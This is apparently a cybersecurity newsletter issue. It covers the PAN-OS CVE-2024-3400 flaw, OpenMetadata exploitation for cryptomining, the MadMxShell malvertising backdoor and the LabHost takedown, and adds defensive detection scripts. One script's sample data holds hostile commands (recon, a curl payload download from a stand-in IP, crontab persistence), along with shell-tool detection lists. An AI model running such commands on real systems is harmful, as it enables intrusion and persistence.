OpenMetadata Vulnerabilities Spotted

Apr 19 2024


Welcome to Gone Phishing, your daily cybersecurity newsletter that's not afraid of the big, bad cyber wolf 🐺

It's Friday, folks, which can only mean one thing… It's time for our weekly segment!

It goes by many names. Patch of the Week, Tweak of the Week. Okay, that's it.

Congrats, the cybercriminals are no match… for your patch! 🩹🩹🩹

Palo Altogether now, get patching! 🩹

🚨 Palo Alto Networks Releases Urgent Fixes for Critical PAN-OS Vulnerability! 🛡️

Palo Alto Networks has rushed out fixes for a maximum-severity flaw in PAN-OS, tracked as CVE-2024-3400 with a CVSS score of 10.0. The bug is a command injection in the GlobalProtect feature that lets an unauthenticated attacker execute arbitrary code as root on the firewall.

Hotfixes are available for PAN-OS 10.2.9-h1, 11.0.4-h1 and 11.1.2-h3, with fixes for further maintenance releases expected soon. Cloud NGFW firewalls are not affected; only specific PAN-OS versions with particular GlobalProtect feature configurations are exposed. Exploitation in the wild, tracked as Operation MidnightEclipse, has been under way since at least March 26, 2024, with attackers using the flaw to drop payloads and run arbitrary commands on compromised firewalls.

Palo Alto Networks has published a CLI command that checks a device for signs of compromise and stresses that patching cannot wait. Technical details and a proof-of-concept exploit have already been published by security researchers, so an unpatched, internet-facing GlobalProtect gateway should be treated as actively targeted. 🚨
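A way to run the same check off-box, as an added example (not Palo Alto's tooling): the vendor's guidance has operators search GlobalProtect's gpsvc.log for "failed to unmarshal session" entries whose session ID contains a slash, because a legitimate session ID never looks like a file path. The script below does that over exported log text. The log lines are constructed for this example and their timestamp prefix is an assumption; only the "failed to unmarshal session(...)" text is the real indicator.

```python
import re
from typing import List, Tuple

# Palo Alto's compromise check greps GlobalProtect's gpsvc.log for unmarshal
# failures whose session ID contains a slash: a session ID shaped like a file
# path is the trace the injection attempts leave behind.
UNMARSHAL_RE = re.compile(r"failed to unmarshal session\((?P<sid>[^)]*)\)")

# Constructed sample log, not a real capture.  The timestamp/prefix layout is
# an assumption; only the "failed to unmarshal session(...)" text matters.
SAMPLE_GPSVC_LOG = """\
2024-04-12 08:01:03 [gpsvc] session handshake ok for user alice
2024-04-12 08:02:17 [gpsvc] failed to unmarshal session(../../../../tmp/x)
2024-04-12 08:03:44 [gpsvc] failed to unmarshal session(abc123garbage)
2024-04-12 08:05:00 [gpsvc] failed to unmarshal session(/tmp/y)
"""


def find_suspicious_sessions(log_text: str) -> List[Tuple[int, str]]:
    """Return (line_number, session_id) for every unmarshal failure whose
    session ID contains a path separator, which is what the vendor grep keys on."""
    hits: List[Tuple[int, str]] = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = UNMARSHAL_RE.search(line)
        if m and "/" in m.group("sid"):
            hits.append((lineno, m.group("sid")))
    return hits


def count_unmarshal_failures(log_text: str) -> int:
    """Total unmarshal failures, path-shaped or not.  A burst of plain garbage
    IDs is weaker evidence but still worth a look alongside the hits above."""
    return sum(1 for line in log_text.splitlines() if UNMARSHAL_RE.search(line))


if __name__ == "__main__":
    import sys

    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_GPSVC_LOG
    hits = find_suspicious_sessions(text)
    print(f"{count_unmarshal_failures(text)} unmarshal failures, "
          f"{len(hits)} with path-shaped session IDs")
    for lineno, sid in hits:
        print(f"  line {lineno}: {sid}")
```

Run it against an exported gpsvc.log (`python check_gpsvc.py gpsvc.log`). A clean result is one signal, not a verdict: logs can be rotated or tampered with, so patch regardless and pair this with a review of the firewall's outbound connections.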

Now, on to today's hottest cybersecurity news stories:

  • 👨‍💻 Exploitation of OpenMetadata Vulnerabilities Spotted 🕵️

  • ⚠️ Watch out! New Backdoor Threat Emerges on Google Ads 🛒

  • 👮 International police smash ‘LabHost’ phishing, 37 arrested 🚓

It's an Open & shut case 😏😏😏

🚨 Urgent Alert: Exploitation of OpenMetadata Vulnerabilities Spotted 🛑

Threat actors are actively exploiting critical vulnerabilities in OpenMetadata to gain a foothold in Kubernetes workloads and use them for cryptocurrency mining, according to Microsoft Threat Intelligence.

🔑 OpenMetadata, an open-source metadata management platform, has become a target because of flaws found by security researcher Alvaro Muñoz: several Spring Expression Language (SpEL) injection vulnerabilities and an authentication bypass.

🛡️ An attacker who bypasses authentication can then trigger the SpEL injection for remote code execution, gaining full control of the compromised container.

🔍 Microsoft's investigation found a consistent pattern: attackers locate internet-exposed OpenMetadata workloads and use the unpatched flaws to execute code in containers running the OpenMetadata image.

🔧 After initial access, the intruders run reconnaissance to gauge their level of access and collect details about the environment and its network configuration.

🔍 That reconnaissance often includes contacting publicly reachable services, such as domains associated with Interactsh, to confirm outbound connectivity without drawing attention.

💰 The end goal is crypto-mining malware on the compromised system, with persistence via cron jobs and, oddly, a personal note left behind to justify the intrusion.

🔒 OpenMetadata users should update to a fixed image (1.3.1 or later), enforce strong authentication, and get rid of default credentials.

🔥 The incident is a reminder that container workloads need to be kept fully patched: an exposed management UI running an old image is exactly what these actors scan for.

🔍 Separately, publicly reachable Redis servers with authentication disabled or unpatched flaws are being targeted to deliver Metasploit Meterpreter payloads, and misconfigured search permissions on Docker directories are being abused for privilege escalation.
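To turn the reconnaissance and persistence behaviour described above into something a SOC can alert on, here is an added example (not Microsoft's tooling and not OpenMetadata's code) that triages process-execution events from a Kubernetes runtime-security sensor. The JSON event shape and the events themselves are constructed for this example; the oast.* domains are projectdiscovery's public Interactsh callback domains.

```python
import json
import re
from typing import List, Tuple

# projectdiscovery's public Interactsh (OAST) callback domains.  The intruders
# Microsoft described hit such domains to confirm they had outbound connectivity.
OAST_DOMAINS = ("oast.pro", "oast.live", "oast.site", "oast.online", "oast.fun", "oast.me")

# Where a Linux attacker writes to persist via cron.
CRON_RE = re.compile(r"crontab\s+-|/etc/cron(?:\.d|tab)|/var/spool/cron")

# The OpenMetadata server image should only ever be running its Java process;
# any of these inside it means someone has a shell.
UNEXPECTED_IN_SERVER = {"sh", "bash", "curl", "wget", "ping", "nc", "crontab"}

# Dotted hostnames inside a command line.
HOST_RE = re.compile(r"\b([a-z0-9-]+(?:\.[a-z0-9-]+)+)\b", re.I)

# Constructed exec events in a made-up JSON-lines shape (not any sensor's real
# schema): an OpenMetadata server pod goes from normal to recon to persistence.
SAMPLE_EVENTS = """\
{"ts":"2024-04-10T02:14:01Z","pod":"openmetadata-server-0","image":"openmetadata/server:1.3.0","proc":"java","cmdline":"java -jar openmetadata.jar server openmetadata.yaml"}
{"ts":"2024-04-10T02:14:37Z","pod":"openmetadata-server-0","image":"openmetadata/server:1.3.0","proc":"sh","cmdline":"sh -c id;uname -a;cat /etc/hosts"}
{"ts":"2024-04-10T02:15:02Z","pod":"openmetadata-server-0","image":"openmetadata/server:1.3.0","proc":"ping","cmdline":"ping -c 1 c8h2k1x.oast.pro"}
{"ts":"2024-04-10T02:15:40Z","pod":"openmetadata-server-0","image":"openmetadata/server:1.3.0","proc":"curl","cmdline":"curl -s http://198.51.100.7/setup.sh -o /tmp/.x/setup.sh"}
{"ts":"2024-04-10T02:16:03Z","pod":"openmetadata-server-0","image":"openmetadata/server:1.3.0","proc":"sh","cmdline":"sh -c (crontab -l;echo '*/5 * * * * /tmp/.x/run')|crontab -"}
{"ts":"2024-04-10T02:16:10Z","pod":"ingestion-worker-3","image":"openmetadata/ingestion:1.3.0","proc":"python","cmdline":"python -m metadata ingest -c /cfg/pipeline.yaml"}
"""


def oast_hosts(cmdline: str) -> List[str]:
    """Hostnames in the command line that fall under an Interactsh domain."""
    return [h for h in HOST_RE.findall(cmdline)
            if any(h.lower() == d or h.lower().endswith("." + d) for d in OAST_DOMAINS)]


def triage(jsonl: str) -> List[Tuple[str, str, str]]:
    """Return (rule, pod, cmdline) for every rule each event trips."""
    findings: List[Tuple[str, str, str]] = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        cmd = ev["cmdline"]
        if oast_hosts(cmd):
            findings.append(("oast_callback", ev["pod"], cmd))
        if CRON_RE.search(cmd):
            findings.append(("cron_persistence", ev["pod"], cmd))
        if ev["image"].startswith("openmetadata/server") and ev["proc"] in UNEXPECTED_IN_SERVER:
            findings.append(("unexpected_process", ev["pod"], cmd))
    return findings


if __name__ == "__main__":
    for rule, pod, cmd in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {pod}: {cmd}")
```

The "unexpected process" rule is the one that fires first in a real intrusion, long before the miner lands, which is why an allow-list of what a given image is supposed to execute is worth more than any miner signature. The OAST and cron rules are corroboration.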

💡 Staying informed and vigilant is essential in defending against evolving cyber threats.

You were only supposed to blow the bloody back doors off! 🙃

🚨 Google Malvertising Campaign Unveiled: New Backdoor Threat Emerges 🔍

🔥 Zscaler ThreatLabz researchers have uncovered a malvertising campaign in which a cluster of domains impersonating legitimate IP scanner software delivers a previously undocumented backdoor dubbed MadMxShell.

🎯 The adversaries registered multiple typosquatted look-alike domains and bought Google Ads to push them to the top of search results, luring victims with what looked like port scanning and IT management software.

🔒 The campaign ran from November 2023 to March 2024 and, according to the researchers, is the first time a sophisticated Windows backdoor has been distributed through this kind of lure, which has understandably raised concern.

💻 Anyone who visits one of the malicious sites and tries to download the software instead receives a ZIP archive containing a DLL and an executable.

🛡️ The executable side-loads the DLL, which starts the infection chain by injecting shellcode; the chain ends with the MadMxShell backdoor, which uses DNS MX queries for command-and-control, a channel that blends into ordinary resolver traffic and is rarely inspected.

⚠️ MadMxShell also carries evasion features, including anti-dumping techniques designed to frustrate memory analysis and forensic investigation.
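DNS-based C2 that rides on MX queries stands out once you look for it: mail servers ask for MX records of bare domains, whereas an endpoint that keeps asking for MX records of ever-changing, high-entropy subdomains of one domain is tunnelling data in the query names. The added example below (not Zscaler's detection logic, and it makes no claim about MadMxShell's exact encoding) scores a resolver log for that pattern; the log lines are constructed.

```python
import math
from collections import Counter, defaultdict
from typing import Dict, List, Tuple

# Constructed resolver log ("timestamp client qtype qname"), not a real capture.
# 10.0.0.15 behaves like a mail relay (MX lookups for bare domains); 10.0.0.23
# behaves like a tunnelling client (MX lookups for unique hex subdomains).
SAMPLE_DNS_LOG = """\
2024-03-02T10:00:01Z 10.0.0.15 A www.example.com
2024-03-02T10:00:02Z 10.0.0.15 MX example.com
2024-03-02T10:00:03Z 10.0.0.15 MX example.net
2024-03-02T10:00:04Z 10.0.0.15 MX example.org
2024-03-02T10:00:05Z 10.0.0.23 A www.example.com
2024-03-02T10:00:06Z 10.0.0.23 MX 9f3a7c1e0b5d2846.mxc2.example
2024-03-02T10:00:36Z 10.0.0.23 MX a1b2c3d4e5f60789.mxc2.example
2024-03-02T10:01:06Z 10.0.0.23 MX 0123456789abcdef.mxc2.example
2024-03-02T10:01:36Z 10.0.0.23 MX fedcba9876543210.mxc2.example
2024-03-02T10:02:06Z 10.0.0.23 MX 13579bdf02468ace.mxc2.example
2024-03-02T10:02:36Z 10.0.0.23 MX 2a4c6e8f1b3d5790.mxc2.example
2024-03-02T10:03:00Z 10.0.0.40 MX mail.example.com
"""


def shannon_entropy(s: str) -> float:
    """Bits per character: ~4.0 for random hex, ~2.0 or less for real words."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def registrable(qname: str) -> str:
    """Last two labels.  Good enough here; a real tool would consult the
    public suffix list so that 'co.uk'-style suffixes are handled."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def find_mx_tunnels(log_text: str, min_queries: int = 5,
                    min_entropy: float = 3.0) -> List[Tuple[str, str, int, float]]:
    """Return (client, domain, mx_query_count, avg_subdomain_entropy) for each
    client/domain pair whose MX queries look like encoded data."""
    per_pair: Dict[Tuple[str, str], List[str]] = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _ts, client, qtype, qname = line.split()
        if qtype == "MX":
            per_pair[(client, registrable(qname))].append(qname)

    findings: List[Tuple[str, str, int, float]] = []
    for (client, domain), names in per_pair.items():
        suffix_len = len(domain) + 1
        subs = [n[:-suffix_len] for n in names
                if len(n) > suffix_len and n.endswith("." + domain)]
        # Bare-domain MX lookups are what mail servers legitimately do; only
        # score pairs where every query carried a subdomain.
        if len(names) < min_queries or len(subs) != len(names):
            continue
        avg = sum(shannon_entropy(s.replace(".", "")) for s in subs) / len(subs)
        if avg >= min_entropy and len(set(names)) == len(names):
            findings.append((client, domain, len(names), round(avg, 2)))
    return findings


if __name__ == "__main__":
    for client, domain, count, ent in find_mx_tunnels(SAMPLE_DNS_LOG):
        print(f"{client}: {count} MX queries to *.{domain}, avg subdomain entropy {ent}")
```

Tune `min_queries` to the beacon interval you can tolerate missing, and baseline by host role: a workstation issuing any MX queries at all is already unusual, while a mail relay issuing thousands for bare domains is normal.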

🌍 The identity and motives of the operators remain unclear, but Zscaler found them active on underground forums, suggesting an interest in running long-term malvertising campaigns.

💡 Users should download software only from the vendor's own site, never from an ad, and keep endpoint security up to date.

🔥 The incident shows how cybercriminals keep abusing legitimate platforms such as ad networks, and why robust security controls and user awareness both matter.

🎣 Catch of the Day!! 🌊🐟🦞

Learn AI in 5 minutes a day. We'll teach you how to save time and earn more with AI. Join 400,000+ free daily readers for trending tools, productivity boosting prompts, the latest news, and more.

Who spilled the beans to the cops? A Lab rat? 💀

🚨 Crackdown on LabHost Cybercrime Service: 37 Arrested in Global Operation 🌍

🔒 Authorities from 19 countries have joined forces in a coordinated crackdown on LabHost, a notorious Phishing-as-a-Service (PhaaS) provider used by cybercriminals worldwide to pilfer personal credentials from unsuspecting victims.

🔍 LabHost, described as one of the largest PhaaS platforms, targeted banks, prominent organisations, and service providers primarily in Canada, the U.S., and the U.K., offering sophisticated phishing pages to facilitate credential theft.

👮‍♂️ The operation, dubbed PhishOFF and Nebulae, led to the arrest of 37 individuals, including key figures behind LabHost, as well as users across the globe. Notably, arrests were made in Melbourne and Adelaide, Australia, alongside apprehensions in the U.K.

💻 Europol, spearheading the initiative, disclosed that LabHost's infrastructure, along with its network of phishing sites, has been seized, dealing a significant blow to the cybercrime ecosystem.

🔒 LabHost, which surfaced in late 2021, boasted a vast array of phishing templates targeting popular brands globally, offering cybercriminals the tools needed to orchestrate large-scale credential theft campaigns.

📈 Trend Micro and Group-IB shed light on the extensive reach of LabHost, emphasising its pernicious capabilities, including real-time campaign management and the pilfering of two-factor authentication codes.

🛡️ The takedown underscores the global law enforcement community's commitment to combating cybercrime and highlights the effectiveness of collaborative efforts in disrupting sophisticated criminal operations.

💰 Authorities estimate LabHost received over £1 million ($1,173,000) in criminal payments, underscoring the lucrative nature of cybercrime facilitated by PhaaS platforms.

⚠️ The crackdown on LabHost serves as a stark reminder of the evolving threat landscape and the need for continued vigilance and cooperation to safeguard against cyber threats.

🗞️ Extra, Extra! Read all about it! 🗞️

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • 🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅

  • 💵 Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

  • 📈 Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think.

So long and thanks for reading all the phish!
